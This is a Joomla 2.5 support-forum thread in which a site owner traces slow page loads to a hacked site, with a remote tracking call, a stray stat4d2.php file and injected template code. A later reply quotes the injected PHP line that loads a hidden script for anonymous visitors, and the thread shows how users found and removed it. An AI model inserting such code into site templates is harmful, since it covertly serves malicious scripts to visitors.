page loading issue

Discussion regarding Joomla! 2.5 security issues.

Moderators: Bernard T, mandville, fcoulter, PhilD, General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
barsara
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Thu Jan 19, 2017 7:15 am

page loading issue

Postby barsara » Thu Jan 19, 2017 9:47 am

Hi,

Our web page loading procedure will stop in "Waiting for arpanet 1957.com..." and complete 30~40 seconds later.
This message we found is in the bottom of browser.
Did anyone see that before? How could we found out why?

Our joomla version is Joomla! 2.5.28 Stable.

Thanks in advance.
Last edited by toivo on Tue Jan 24, 2017 10:28 am, edited 1 time in total.

itoctopus
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 4008
Joined: Mon Nov 25, 2013 4:35 pm
Location: Montreal, Canada
Contact:

Re: page loading issue

Postby itoctopus » Thu Jan 19, 2017 4:17 pm

There are 2 possible reasons (that I can think of) for this problem:

- A bad extension
- A hacked website

In both cases, the website is trying to grab data from a remote location, but failing after 30 seconds (which is your PHP timeout limit).

Check your extensions and ensure your website is clean (scan it).
http://www.itoctopus.com - Joomla consulting at its finest
https://twitter.com/itoctopus - Follow us on Twitter

barsara
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Thu Jan 19, 2017 7:15 am

Re: page loading issue

Postby barsara » Mon Jan 23, 2017 1:49 am

Hi,

Thanks for your reply.

We search our web source with keyword "arpanet1957.com" but nothing found. We also use some tools to scan host and it looks good. We may try to check joomla extension, but it's so many. It may be one big task and we need to think one way to do this.

lolofr
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Mon Jan 23, 2017 8:37 pm

Re: page loading issue

Postby lolofr » Mon Jan 23, 2017 9:22 pm

Have you find your issue ?

barsara
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Thu Jan 19, 2017 7:15 am

Re: page loading issue

Postby barsara » Tue Jan 24, 2017 1:39 am

Not yet, we still check...

We found out this weird url will take different parameter in different client, like this
http://arpan et1957.com//plix/scaner.php?id=4&tz=8&rs=1280x800
or
http://arp anet1957.com//plix/scaner.php?id=4&tz=8&rs=1920x1080

it looks like the monitor resolution and we may try to check which module/extension handle this.
If our way is wrong, please let us know.
Thanks.
Last edited by mandville on Tue Jan 24, 2017 10:36 am, edited 1 time in total.
Reason: Broke link

itoctopus
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 4008
Joined: Mon Nov 25, 2013 4:35 pm
Location: Montreal, Canada
Contact:

Re: page loading issue

Postby itoctopus » Tue Jan 24, 2017 4:35 am

That's a hacked file. Proceed accordingly - you should cleanup your website (there are many cleanup guides on this website and elsewhere).
http://www.itoctopus.com - Joomla consulting at its finest
https://twitter.com/itoctopus - Follow us on Twitter

barsara
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Thu Jan 19, 2017 7:15 am

Re: page loading issue

Postby barsara » Tue Jan 24, 2017 6:39 am

Hi,

We compare web source directory with our backup and found out a file named stat4d2.php in www/media/system/js is not in our backup.
Then we search our web source with keyword "stat4d2" and this keyword can be found in www/template/*.
So we remove some code in www/template/* and delete stat4d2.php. It looks good now, but we still check if this cause side effects.

Thanks.

alex351
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Tue Jan 24, 2017 6:40 am

Re: page loading issue

Postby alex351 » Tue Jan 24, 2017 6:46 am

I think you should clean your site first.

barsara
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Thu Jan 19, 2017 7:15 am

Re: page loading issue

Postby barsara » Tue Jan 24, 2017 10:05 am

alex351 wrote:I think you should clean your site first.


Hi,
It's a good suggestion. Could you tell us how to clean it? Did you mean scan website, or check all source, or....
We'll appreciate if you could give us some hints. Thanks.

User avatar
ribo
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 3112
Joined: Sun Jan 03, 2010 8:47 pm
Contact:

Re: page loading issue

Postby ribo » Tue Jan 24, 2017 10:32 am

barsara wrote:
alex351 wrote:I think you should clean your site first.


Hi,
It's a good suggestion. Could you tell us how to clean it? Did you mean scan website, or check all source, or....
We'll appreciate if you could give us some hints. Thanks.

Please see the instrructions about how to clean your site from here viewtopic.php?f=714&t=945958#p3457104
It s the only way to clean it for sure. So it s good to move fast. After that migrate to the curent latest version
chat room spontes : http://www.spontes.com

barsara
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Thu Jan 19, 2017 7:15 am

Re: page loading issue

Postby barsara » Wed Jan 25, 2017 1:41 am

ribo wrote:
barsara wrote:
alex351 wrote:I think you should clean your site first.


Hi,
It's a good suggestion. Could you tell us how to clean it? Did you mean scan website, or check all source, or....
We'll appreciate if you could give us some hints. Thanks.

Please see the instrructions about how to clean your site from here viewtopic.php?f=714&t=945958#p3457104
It s the only way to clean it for sure. So it s good to move fast. After that migrate to the curent latest version


Hi,

Thanks for your information. We'll check.

drale01
Joomla! Apprentice
Joomla! Apprentice
Posts: 38
Joined: Mon Apr 02, 2012 4:46 pm

Re: page loading issue

Postby drale01 » Tue Feb 28, 2017 9:13 am

I have same problem and I cleaned code from every index.php in my /templates/* there was 8 templates
<?php $_a486c270=1;if(is_object($_SESSION["__default"]["user"]) && !($_SESSION["__default"]["user"]->id)) {echo " <script language=JavaScript id=onDate ></script> <script language=JavaScript src=/media/system/js/stata48.php ></script> ";};$_a486c270=1; ?>
So be sure to clean every index.php from every template.
Also I had stata48.php file in /media/system/js/ and in one more place (I can't remember). So you need to search all you files for stat*.php

Barsara, did google remove your site from dangerous?


Return to “Security in Joomla! 2.5”

Who is online

Users browsing this forum: No registered users and 4 guests